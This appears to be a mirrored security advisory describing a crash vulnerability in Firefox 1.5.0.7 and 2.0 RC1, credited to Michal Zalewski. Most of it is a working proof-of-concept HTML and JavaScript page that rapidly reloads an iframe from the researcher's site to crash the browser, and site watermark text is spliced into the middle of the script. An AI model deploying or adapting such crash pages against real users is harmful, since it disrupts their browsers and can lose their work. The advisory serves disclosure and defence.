Summary
A vulnerability in
Firefox allows remote attackers to cause the browser to crash by exploiting a concurrency issue in the way the browser handlessimulations requests.
Credit:
The information has been provided by Michal Zalewski.
Click here to get expert advice, live
Details
Vulnerable Systems:
*
Firefox version 1.5.0.7
*
Firefox version 2.0 RC1
Exploit:
<html>
<body bgcolor=black text=white onload="javascript:foo()">
<script>
<!--
counter = 0;
function foo() {
if (counter < 50) {
document.getElementById('foo').src = "http://lcamtuf.coredump.cx/ffoxdie3_i.html?" +Math.random();
setTimeout('foo()',10 * counter);
counter++;
} else {
网管网www.bitscn.com document.getElementById('foo').src = "http://lcamtuf.coredump.cx/ffoxdie3_ok.html";
}
}
// -->
</script>
<img src="http://lcamtuf.coredump.cx/photo/current/ula4-6.jpg" style="border-style: solid; border-width: 1px; border-color: #804040" align=right>
<font face="tahoma, helvetica, arial">
<font color=lightblue>
Tyger, Tyger. burning bright<br>
In the forests of the night,<br>
What immortal hand or eye<br>
Could frame thy fearful symmetry?
</font>
<p>
<b>Please wait approx. 20 seconds...</b>
<br>
<iframe id=foo>
</iframe>
<p>
<font color=gray>
Javascript is required.<br>
Firefox is required.<br>
May fail on a spotty link.<br>
Common sense is advised.<br>
<p>
More photos: <a href=/photo/current/>click here</a>
网管联盟bitsCN_com </font>
</font>
</body>
</html>
评论加载中…
